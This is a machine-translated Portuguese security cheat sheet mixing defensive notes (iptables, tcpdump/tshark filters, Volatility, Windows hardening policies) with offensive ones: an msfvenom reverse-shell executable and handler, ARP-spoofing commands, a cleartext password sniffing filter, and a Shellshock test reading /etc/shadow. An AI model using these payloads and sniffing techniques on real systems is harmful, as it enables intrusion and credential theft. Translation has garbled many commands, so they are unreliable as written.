Machine Translated by Google

CONFIGURAÇÃO DO FIREFOX PARA PROXY SSH/SOCKS:

GPG4Win 1.

Criptografe um arquivo para o destinatário usando sua chave pública: D:\gpg --

encrypt -r Bob myFile.txt (ASCII Armor Switch) (pode
--armadura definir o nome do arquivo de saída)
senha para --output --symmetric (defina uma
criptografar e descriptografar 2. Descriptografia: gpg –decrypt my-file.gpg pode
usar um - -output 3.
Assinatura: gpg --armor --sign my-
file.txt VOCÊ PODE
COMBINAR
ESTES

4. Criação de chave: gpg

--gen-key --edit-key
bob (Isso editará a chave atual)
5. Importando Chaves:
Machine Translated by Google

gpg --import d:\temp\pubKeybob.asc gpg --

import d:\temp\meu-sec.gpg
6. Listando
chaves: gpg -kv (chaves
públicas) gpg --
list-keys 7. Exportar
chave pública: gpg --armor --output pub.asc --
export Chris --export-
secret-keys 8. Assinar chaves para
que sejam aceitas gpg --sign-key
[email protected] 9.
Enviando de volta a chave assinada gpg --export
--armor [email protected] 10. Criptografar mensagem para envio
gpg --encrypt --sign --armor -r [email protected] nome_do_arquivo
Volatilidade:
volatilidade -f flag4.raw psxview
volatilidade -f flag4.raw --pid=1288 cmdline
volatilidade -f flag4.raw memdump -p 1288 -D dir/
Abra no Notepad++/FRHED para ver o que o processo fez

OpenVas
root@kali:~# apt-get update
root@kali:~# apt-get dist-upgrade

root@kali:~# apt-get install openvas

root@kali:~# openvas-setup
root@kali:~# netstat -antp
Conexões ativas de Internet (servidores e estabelecidas)
Proto Recv-Q Send-Q Endereço local Endereço estrangeiro Estado PID/Nome do
programa tcp 0 0 127.0.0.1:9390 0.0.0.0:* LISTEN 9583/
openvasmd tcp 0 0 127.0.0.1:9391 0.0.0.0:* LISTEN 9570/
openvassd : Espere tcp 0 0 127.0.0.1:9392 0.0.0.0:*
ESCUTE 9596/gsad
root@kali:~# openvas-start
https://127.0.0.1:9392 openvas-check-setup

openvas-stop
openvasmd --create-user=admin --role=Admin
openvasmd --user=admin --new-password=admin openvas-
start

NMAP 1. O

seguinte fará a varredura apenas da porta 22 e então fará uma lista: nmap -n -p
22 -Pn --open 192.168.119.133 | grep report | cut -d " " -f5 > /tmp/ipaddr.list 2.

Tabelas IP
Status de
exibição: #iptables -L -n -v
Com números de linha:
Machine Translated by Google

#iptables -n -L -v –line-numbers Exibição

de entrada ou saída por linhas
#iptables -L INPUT -n -v
#iptables -L OUTPUT -n -v –line-numbers Iniciar/
Parar/Reiniciar
#service iptables start
#service iptables stop
#service iptables restart
Liberar/Excluir todas as
regras:
#iptables -F Excluiu uma regra específica
da linha #iptables -D INPUT
4 Insere uma regra
específica #iptables -I INPUT 2 -s 202.54.1.2 -j DROP (Descarta todos os pacotes vindos de 202.54.1.2)
Para salvar regras de firewall no CentOS / RHEL / Fedora Linux, digite: #service
iptables save
Para restaurar regras de firewall de um arquivo chamado /root/my.active.firewall.rules, digite: #
iptables-restore < /root/my.active.firewall.rules Para restaurar
regras de firewall no CentOS / RHEL / Fedora Linux, digite: #service iptables restart
Para definir padrões:

# iptables -P INPUT DROP #

iptables -P OUTPUT DROP #
iptables -P FORWARD DROP
Instalações padrão
básicas: # iptables -N LOGGING #Cria uma nova cadeia#logs para /var/log/messages /var/
log/kern.log.
# iptables -P INPUT DROP #
iptables -P FORWARD DROP # iptables
-P OUTPUT ACCEPT # iptables -A
INPUT -m state --state NEW,ESTABLISHED -j ACCEPT # iptables -A INPUT -p udp -s
192.168.1.5 --sport 514 -d 192.168.1.100 --dport 1024:65535 -j LOG
–log-nível 4
# iptables -A INPUT -p udp -s 192.168.1.5 --sport 514 -d 192.168.1.100 --dport 1024:65535 -j DROP # iptables -A INPUT -i lo -j ACCEPT # iptables -A
OUTPUT -i lo -j ACCEPT ESTA PRÓXIMA PARTE
REGISTRA TODOS OS PACOTES DESCARTADOS QUE
CHEGARAM AO FIM QUE VEM # iptables -N LOGGING # iptables -A INPUT -j LOGGING # iptables -A LOGGING -m limit --limit 2/min -j LOG --log-prefix "IPTables-

Dropped: " --log-level 4 # iptables -A

LOGGING -j DROP MAIS REGRAS DIVERSAS

iptables -A OUTPUT -j ACCEPT Isso

informa ao Iptables para adicionar uma regra que aceite OUTPUT.

Agora você deve ter:

iptables -F
iptables -A ENTRADA -i lo -j ACEITAR
Machine Translated by Google

iptables -A INPUT -m estado --estado ESTABELECIDO,RELACIONADO -j ACEITAR

iptables -A ENTRADA -p tcp --sport 80 -j ACEITAR
iptables -A ENTRADA -p udp --sport 53 -j ACEITAR
iptables -A ENTRADA -j DROP
iptables -A SAÍDA -j ACEITAR
iptables-save > /etc/iptables.rules

NGREP
#para I em *; faça ngrep -W byline -O /tmp/pcapname$i.pcap -qI $i host 1.2.3.4; feito
#cd tmp
#mergecap -w novonomepcap.pcap srcPcap*
TCPDUMP
TCPDUMP
ip[0] & 0x0f = 5 (Isso encontraria todos os pacotes sem opções de ip)
ip[0] & 0x0f > 5 (Isso encontraria todos os pacotes com opções de ip, já que normalmente não são maiores que 20)

BITMASKING

CWR | ECE | URG | ACK | PSH | RST | SIN | FIN

0 00000000 0 0 0 1 0 = 0x02 = Sincronização

0 1 0 0 1 0 0x12 = Sincronização/Reconhecimento

0 1 1 0 0 0 0x18 = 0x11 EMPURRAR/RECUTIR

0 1 0 0 0 1 FIM/ACK
Valores correspondentes: 2
8 4 1 |8 4 2 1

Portanto:
tcp[13] = 0x02 (fornece apenas pacotes syn) exclusivo
tcp[13] & 0x02 = 0x02 (não nos importamos com a aparência dos outros campos, desde que SYN esteja definido.) inclusive

usando essa mesma lógica, poderíamos ser inclusivos especificamente:

tcp[13] & 0x0f = 0x02 (isso diz que queremos pelo menos ter o sinalizador SYN, NÃO queremos os sinalizadores PSH, RST e
FIN, MAS…. não nos importamos com os sinalizadores CWR, ECE, URG, ACK

Outros exemplos:

tcp[12] & 0x0f > 0x50 (Neste estamos mascarando o bitmask do nibble de ordem esquerda para o comprimento do cabeçalho tcp.
Não nos importamos com o que está na ordem correta nibble do byte. Queremos apenas qualquer coisa que seja maior que 5x4 =
20 bytes de comprimento para o cabeçalho tcp)

tcp[13] & 0x14 != 0 (Isso diz que todos os sinalizadores, mas pelo menos o ack ou o primeiro sinalizador, devem estar ativados)

A máscara basicamente diz: eu só me importo com os bits especificados na máscara.

1. Capture usando configurações de hora e data:

tcpdump -i eth1 -s0 -v -w /tmp/capture_`data +%d_%m_%Y__%H_%I_%S`.pcap
2. tcpdump top 10 talkers. captura 2000 pacotes e imprime os 10 principais talkers
Machine Translated by Google

tcpdump -tnn -c 2000 -i eth0 | ahk -F "." '{imprimir $1"."$2"."$3"."$4}' | classificar | único -c | classificar -nr | awk '$1 > 10'

3. tcmdump verifica ping. captura apenas solicitações de eco de ping com tcpdump
tcpdump -nni eth0 -e icmp[tipo icmp] == 8
4. fareja o tráfego de rede em uma determinada interface e exibe os endereços IP das máquinas que se comunicam com o host atual (um
IP por linha):
sudo tcpdump -i wlan0 -n ip | awk '{ imprimir gensub(/(.*)\..*/,"\\1","g",$3), $4, gensub(/(.*)\..*/,"\\1" ,"g",$5) }' | awk -F " >

" '{imprimir $1"\n"$2}'

5. tcpdump fareja pop3,imap,smtp e http e então executa grep:
tcpdump -i eth0 porta http ou porta smtp ou porta imap ou porta pop3 -l -A | egrep -i 'pass=|pwd=|
log=|login=|user=|username=|pw=|passw=|passwd=|password=|pass:|user:|username:|password:|login:|pass |user '

6. Todo o tráfego, exceto de determinados hosts:

sudo tcpdump -n -i eth0 -w data.pcap -v tcp ou udp e 'não host 192.168.1.2'
SMTP
Comandos SMTP
A tabela a seguir lista os comandos SMTP fornecidos pelo serviço SMTP do Microsoft Windows® (SMTPSVC).
Comandos SMTP

Função de comando
Comando SMTP

Olá Enviado por um cliente para se identificar, geralmente com um nome de domínio.

Permite que o servidor identifique seu suporte aos comandos do Protocolo de Transferência de Correio
EHLO
Simples Estendido (ESMTP).

CORRESPONDÊNCIA

DE Identifica o remetente da mensagem; usado no formato MAIL FROM:.

RCPT TO Identifica os destinatários da mensagem; usado no formato RCPT TO:.

Permite que o cliente e o servidor troquem de função e enviem e-mails na direção reversa
VEZ
sem precisar estabelecer uma nova conexão.

O comando ATRN (Authenticated TURN) opcionalmente pega um ou mais domínios como parâmetro.
ATRN O comando ATRN deve ser rejeitado se a sessão não tiver sido autenticada.

Fornece um mecanismo pelo qual o servidor SMTP pode indicar o tamanho máximo de mensagem
suportado. Servidores compatíveis devem fornecer extensões de tamanho para indicar o tamanho
TAMANHO
máximo de mensagem que pode ser aceito. Clientes não devem enviar mensagens maiores que o
tamanho indicado pelo servidor.

Uma extensão do SMTP. O ETRN é enviado por um servidor SMTP para solicitar que outro servidor
ETRN
envie quaisquer mensagens de e-mail que ele tenha.

PIPELININ Fornece a capacidade de enviar um fluxo de comandos sem esperar por uma resposta
Machine Translated by Google

G depois de cada comando.

Um comando ESMTP que substitui o comando DATA. Para que o host SMTP não tenha que escanear
continuamente o fim dos dados, este comando envia um comando BDAT com um argumento que
PEDACINHO contém o número total de bytes em uma mensagem. O servidor receptor conta os bytes na mensagem e,
G quando o tamanho da mensagem é igual ao valor enviado pelo comando BDAT, o servidor assume
que recebeu todos os dados da mensagem.

DADOS Enviado por um cliente para iniciar a transferência do conteúdo da mensagem.

DSN Um comando ESMTP que habilita notificações de status de entrega.

RESET Anula toda a transação da mensagem e redefine o buffer.

Verifica se uma caixa de correio está disponível para entrega de mensagens; por exemplo, vrfy
VRFY ted verifica se uma caixa de correio para Ted reside no servidor local. Este comando está desativado
por padrão em implementações do Exchange.

AJUDA Retorna uma lista de comandos suportados pelo serviço SMTP.

DESISTIR Encerra a sessão.

A tabela a seguir lista os comandos SMTP estendidos que o Exchange disponibiliza para o serviço SMTP.
Comandos SMTP estendidos

Comando SMTP
Função de comando
estendido

Um método usado pelos servidores Microsoft Exchange Server 2003 e

X-EXPS GSSAPI
Exchange 2000 Server para autenticação.

Um método usado pelos servidores Exchange 2000 e Exchange 2003 para autenticação.
X-EXPS=LOGIN

Fornece a capacidade de propagar propriedades de mensagem durante a comunicação

X-EXCH50
de servidor para servidor.

X-LINK2ESTADO Adiciona suporte para roteamento de estado de link no Exchange.

Cargas úteis do Metasploit:

Processo geral para criar exe
root@kali:~# msfvenom -a x86 --plataforma windows -p windows/shell/reverse_tcp LHOST=192.168.1.101 LPORT=3333 -b "\x00"
-e x86/shikata_ga_nai -f exe -o /tmp/1.exe

root@kali:~# msfconsole -q
msf > usar exploit/multi/handler
Machine Translated by Google

msf exploit(handler) > mostrar opções

msf exploit(handler) > definir carga útil windows/shell/reverse_tcp
carga útil => windows/shell/reverse_tcp

msf exploit(handler) > mostrar opções

msf exploit(handler) > definir LHOST 172.16.104.130
LHOST => 172.16.104.130

msf exploit(handler) > definir LPORT 3333

LPORTO => 31337

msf exploit(manipulador) > exploit

Carga útil do PHP:

definir CARGA php/meterpreter/bind_tcp

Carga útil do Linux
usar carga útil/linux/x86/shell_reverse_tcp

EtterCap/Arpspoof 0.5. Primeiro

habilite o encaminhamento de IP: echo 1 > /proc/sys/net/ipv4/ip_forward 1. Uma sub-
rede inteira: ettercap
-T -M arp:remote //192.168.119.0/24 2. Mesma coisa
usando arpspoof arpspoof -t
192.168.1.1 192.168.1.2 & >/dev/null arpspoof -t 192.168.1.2
192.168.1.1 & >/dev/null killall arpspoof 3. Então use
wireshark ou
tcpdump para capturar o tráfego entre os dois 4. Sniffing de tráfego com p0f: p0f -i
eth0 -o /tmp/p0f.pcap

tubarão
Interface de captura: -i
<interface> nome ou idx da interface (def: primeiro não loopback) -f <filtro de captura> filtro
de pacotes na sintaxe do filtro libpcap comprimento do instantâneo do
lista de interfaces pacote (def: 65535) -s <snaplen> imprime a
e sai -D -d decodificar como. Ex- tshark -d
tcp.port==8888,http -c <contagem de pacotes> para após n pacotes (def: infinito)
lidos de um arquivo
-r
-Y <filtro de exibição> filtro de exibição de pacotes na sintaxe do filtro de exibição do Wireshark
-n desabilita todas as resoluções de nomes (def: todas habilitadas)
-w <outfile|-> escreve pacotes em um arquivo no formato pcap chamado "outfile"
-T pdml|ps|psml|texto|campos
formato do campo de saída de texto (def:
-e <campo> text) a ser impresso se -Tfields for selecionado (por exemplo, tcp.port,
col.Info); esta opção pode ser repetida para imprimir vários campos
-ta|ad|d|dd|e|r|u|ud formato de saída de carimbos de hora (def: r: rel. para o primeiro) -us|
hms formato de saída de segundos (def: s: segundos)
Amostras:
tshark -r newcarve.pcap -Y "udp.srcport == 53" -n -T campos -e dns.qry.name -e dns.resp.addr
(lê um arquivo e filtra o tráfego DNS e exibe os campos de consulta e resposta do DNS)
Machine Translated by Google

tshark -n -r snort.log.1425686433 -Y http -T campos -e http.user_agent

(lê um arquivo e filtra http e então exibe apenas certos campos)
tshark -nr 2015-03-04.pcap -q -z seguir,tcp,ascii,xxxxx
(exporta apenas as cargas úteis)
tshark -r test.pcap -Y 'http.request.method == POST e tcp contém "senha"' | grep senha

#!/usr/bin/env python3
subprocesso de importação

''
''
arquivoorigem = wsfilter =

"
tsharkcmd = "tshark -r ' -E "' + '" -T campos -e tcp.stream | sort -un > /tmp/tcpstream.txt'
+ srcfile + + wsfilter
tmpdst = abrir('/tmp/tcpstream.txt','r')

para i em tmpdst.readlines():
" "
subprocesso.call("tshark -nr + arquivo src + -q -z seguir,tcp,ascii," + i, shell=True)

tmpdst.fechar()
Para despejar cargas úteis ICMP:
tshark -r infile -Y icmp -T campos -e dados | tr -d '\n' > hex.txt

#Então execute python:

importar codecs

arquivo1 = aberto('hex.txt','r').ler()
arquivo1 = bytes.fromhex(arquivo1).decode('ISO-8859-1') #ou utf-8
imprimir(arquivo1)

Encontrando arquivos modificados recentemente

Encontre recursivamente os últimos arquivos modificados, começando pelos mais recentemente alterados:
$ find /etc -type f -printf '%TY-%Tm-%Td %TT %p\n' | ordenar -r
Para procurar arquivos em /target_directory e todos os seus subdiretórios, que foram modificados nos últimos 60 minutos:
Machine Translated by Google

$ find /target_directory -type f -mmin -60 Para

procurar arquivos em /target_directory e todos os seus subdiretórios, que foram modificados nos últimos 2 dias: $ find /
target_directory -type f -mtime -2 Para procurar
arquivos em /target_directory e todos os seus subdiretórios com no máximo 3 níveis de profundidade, que foram modificados nos
últimos 2 dias: $ find /
target_directory -type f -mtime -2 -depth -3 Você também
pode especificar o intervalo de tempo de atualização. Para procurar arquivos em /target_directory e todos os seus subdiretórios, que foram
modificados nos últimos 7 dias, mas não nos últimos 3 dias: $ find /
target_directory -type f -mtime -7 ! -mtime -3
Para procurar arquivos em /target_directory (e todos os seus subdiretórios) que foram modificados nos últimos 60 minutos e imprimir
seus atributos de arquivo:
$ find /diretório_de_destino -tipo f -mmin -60 -exec ls -al {} \;

Script de decodificação Python3

#!/usr/bin/env python3
importação
base64 importação codecs

x = input('Digite a string b64 que você deseja decodificar: ')

b64string = x.encode()

b64string = base64.b64decode(b64string)
imprimir(str(b64string)[2:-1])

#descomente esta parte e comente a outra se quiser abrir e decodificar um arquivo #b64file = open('./
filelocation.txt','r') #filetext =
base64.b64decode(b64file) #print(str(filetext)
[2:-1])

Tipos de hash /etc/shadow

$1$
md5
$2a$
Baiacu $2y$

Blowfish, com tratamento correto de caracteres de 8 bits $5$

sha-256
$6$
sha-512

Encontrando ADS
diretório /R

CHOQUE DE CONCHA

env x='() { :;}; echo vulnerável' bash -c 'echo este é um teste'

Machine Translated by Google

env x='() { :;}; cat /etc/shadow' bash -c 'echo hello'

Endurecimento de janelas
-aumentar UAC

-serviços.msc

-msconfig/pasta de inicialização

-atualização do windows

-IE Smart Screen Filter e outras configurações

- permissões de conta de usuário - compmgmt.msc

-shares/permissões de arquivo

-atualizar aplicativos diversos

-remover programas desnecessários

-política de segurança local (secpol.msc, gpedit.msc)

-centro de ação

-desabilitar ipv6

-firewall usou opções avançadas de segurança. Bloqueia conexões de entrada e saída

-gpedit.msc/secpol.msc

Configurações GPEDIT/SECPOL.msc

Configuração do computador\Configurações do Windows\Configurações de segurança\Políticas de conta\Política de senha\

Comprimento mínimo da senha = 15

Configuração do computador\Configurações do Windows\Configurações de segurança\Políticas locais\Opções de segurança\

Logon interativo: Não exibir o último nome do usuário = habilitado

Controle de conta de usuário: virtualizar falhas de gravação de arquivo e registro em locais por usuário = habilitado

Controle de conta de usuário: Elevar somente aplicativos UIAccess instalados em locais seguros = habilitado

Controle de conta de usuário: comportamento do prompt de elevação para usuários padrão = prompt de credenciais na área de trabalho segura

Controle de conta de usuário: comportamento do prompt de elevação para administradores no modo de aprovação de administrador = prompt de consentimento na

área de trabalho segura

MSS: (SafeDllSearchMode) Habilitar modo de pesquisa de DLL segura (recomendado) = habilitado

Machine Translated by Google

Desligamento: permitir que o sistema seja desligado sem precisar fazer logon = habilitado

Logon interativo: Não requer CTRL+ALT+DEL = desabilitado

Configuração do computador\Configurações do Windows\Configurações de segurança\Políticas locais\Atribuição de direitos do usuário\

Ignorar verificação de travessia = Usuários, Serviço de rede, Serviço local, Administradores

Permitir logon local = Administradores, Usuários

Configuração do computador\Modelos administrativos\Componentes do Windows\Interface do usuário de credenciais\

Exigir caminho confiável para entrada de credenciais = habilitado

Configuração do computador\Configurações do Windows\Configurações de segurança\Políticas locais\Opções de segurança\Logon interativo:

Não requer CTRL+ALT+DEL

Logon interativo: Não requer CTRL+ALT+DEL = Desativado

Configuração do computador\Modelos administrativos\Componentes do Windows\Políticas de reprodução automática\

Desligar a reprodução automática = ativado

Desligar a reprodução automática = Todas as unidades

Comportamento padrão para AutoRun = Não executar nenhum comando de execução automática

Desativar a reprodução automática para dispositivos sem volume = ativado

Configuração do computador\Modelos administrativos\Componentes do Windows\NetMeeting\

Desabilitar Compartilhamento Remoto da Área de Trabalho = habilitado

Configuração do computador\Modelos administrativos\Sistema\Comunicação com a Internet

Gerenciamento\Configurações de comunicação pela Internet\

Desativar o Programa de Melhoria da Experiência do Cliente do Windows Messenger = ativado

Desativar o conteúdo do Centro de Ajuda e Suporte "Você sabia?" = habilitado

Desativar o Programa de Melhoria da Experiência do Usuário do Windows = ativado

Configuração do computador\Modelos administrativos\Rede\Rede ponto a ponto da Microsoft

Serviços\

Desativar os serviços de rede ponto a ponto da Microsoft = ativado

Configuração do computador\Configurações do Windows\Configurações de segurança\Políticas locais\Segurança

Opções\Interativo logon: comportamento de remoção do cartão inteligente

Logon interativo: comportamento de remoção do cartão inteligente = Bloquear estação de trabalho

Machine Translated by Google

Configuração do computador\Configurações do Windows\Configurações de segurança\Políticas locais\Opções de segurança\Contas:

Status da conta de convidado

Contas: Status da conta de convidado = Desativado

Configuração do computador\Configurações do Windows\Configurações de segurança\Políticas locais\Opções de segurança\Contas:

Renomear conta de administrador

Contas: Renomear conta de administrador = Não definido

Contas: Renomear conta de convidado = Não definido

Configuração do computador\Modelos administrativos\Componentes do Windows\Windows Mail\

Desativar os recursos das comunidades = habilitado

Desligar o aplicativo Windows Mail = habilitado

Configuração do computador\Modelos administrativos\Sistema\Assistência remota\

Assistência Remota Solicitada = desabilitado

Configuração do computador\Modelos administrativos\Componentes do Windows\Grupo doméstico\

Impedir que o computador entre em um grupo doméstico = habilitado

Configuração do computador\Configurações do Windows\Configurações de segurança\Firewall do Windows com Advanced

Segurança\Firewall do Windows com Segurança Avançada\Propriedades do Firewall do Windows\Perfil Público\

Firewall do Windows: Público: Permitir resposta unicast = Não

Configuração do usuário\Modelos administrativos\Painel de controle\Personalização\

Proteger a proteção de tela com senha = habilitado

Configuração do computador\Configurações do Windows\Configurações de segurança\Políticas locais\Opções de segurança\MSS:

(ScreenSaverGracePeriod) O tempo em segundos antes que o período de carência do protetor de tela expire (0 recomendado)

MSS: (ScreenSaverGracePeriod) O tempo em segundos antes que o período de carência do protetor de tela expire (0 recomendado) = 0

Configuração do computador\Configurações do Windows\Configurações de segurança\Políticas locais\Segurança

Opções\Interativo logon: Exibir informações do usuário quando a sessão estiver bloqueada

Logon interativo: Exibir informações do usuário quando a sessão estiver bloqueada = Habilitar

Configuração do computador\Configurações do Windows\Configurações de segurança\Políticas locais\Opções de segurança\Criptografia do

sistema: Forçar proteção de chave forte para chaves de usuário armazenadas no computador

Criptografia do sistema: Forçar proteção de chave forte para chaves de usuário armazenadas no computador = Habilitar
Machine Translated by Google

Configuração do computador\Configurações do Windows\Configurações de segurança\Políticas locais\Opções de segurança\Usuário

Controle de conta: comportamento do prompt de elevação para usuários padrão

Controle de conta de usuário: comportamento do prompt de elevação para usuários padrão = Negar elevação automaticamente

pedidos

Configuração do computador\Modelos administrativos\Componentes do Windows\Windows Installer\Sempre instalar com privilégios elevados

Sempre instalar com privilégios elevados = Desativado

Configuração do computador\Modelos administrativos\Sistema\Comunicação com a Internet

Gerenciamento\Configurações de comunicação da Internet\Desativar download de drivers de impressão por HTTP

Desativar download de drivers de impressão via HTTP = Ativado

Configuração do computador\Configurações do Windows\Configurações de segurança\Políticas locais\Opções de segurança\Acesso à rede: Não

permitir enumeração anônima de contas e compartilhamentos SAM

Acesso à rede: Não permitir enumeração anônima de contas e compartilhamentos SAM = Habilitado

Configuração do computador\Configurações do Windows\Configurações de segurança\Políticas locais\Opções de segurança\Desligamento:

Limpar arquivo de paginação de memória virtual

Desligamento: Limpar arquivo de paginação de memória virtual = Habilitar

Protocolo 2
Protocolo